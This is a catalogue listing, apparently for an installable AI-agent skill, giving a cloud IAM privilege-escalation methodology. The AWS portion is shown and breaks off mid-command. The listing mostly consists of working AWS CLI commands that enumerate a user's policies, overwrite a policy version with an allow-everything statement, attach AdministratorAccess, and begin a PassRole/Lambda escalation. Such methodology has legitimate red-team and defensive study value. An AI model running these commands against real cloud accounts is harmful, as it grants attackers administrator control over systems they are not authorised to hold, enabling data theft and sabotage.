← ClaudeAtlas

iam-privesclisted

Cloud IAM privilege escalation methodology for AWS, Azure, and GCP. Covers misconfigured roles, policy enumeration, assume-role chaining, and escalation to admin/root equivalent access.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63
Install: claude install-skill sunilgentyala/OmniRed
# Cloud IAM Privilege Escalation ## Attack Surface IAM misconfigurations that allow escalation: overly permissive roles, writable policy attachments, unintended trust relationships, wildcard permissions, privilege escalation via service accounts, and Lambda/EC2 metadata credential exposure. ## Methodology — AWS ### Phase 1 — Enumerate current permissions ```bash # Current identity aws sts get-caller-identity # Enumerate attached policies aws iam list-attached-user-policies --user-name <username> aws iam list-user-policies --user-name <username> aws iam list-groups-for-user --user-name <username> # Get policy document (find escalation vectors) aws iam get-policy-version --policy-arn <arn> --version-id v1 # Automated enumeration python3 enumerate-iam.py --access-key <key> --secret-key <secret> ``` ### Phase 2 — Key escalation vectors (AWS) **iam:CreatePolicyVersion** (overwrite existing policy): ```bash aws iam create-policy-version --policy-arn <arn> \ --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' \ --set-as-default ``` **iam:AttachUserPolicy** (attach AdministratorAccess): ```bash aws iam attach-user-policy --user-name <username> \ --policy-arn arn:aws:iam::aws:policy/AdministratorAccess ``` **iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction:** ```bash # Create Lambda with a high-privilege role and invoke it to escalate aws lambda create-function --function-name priv-esc \ --runtime py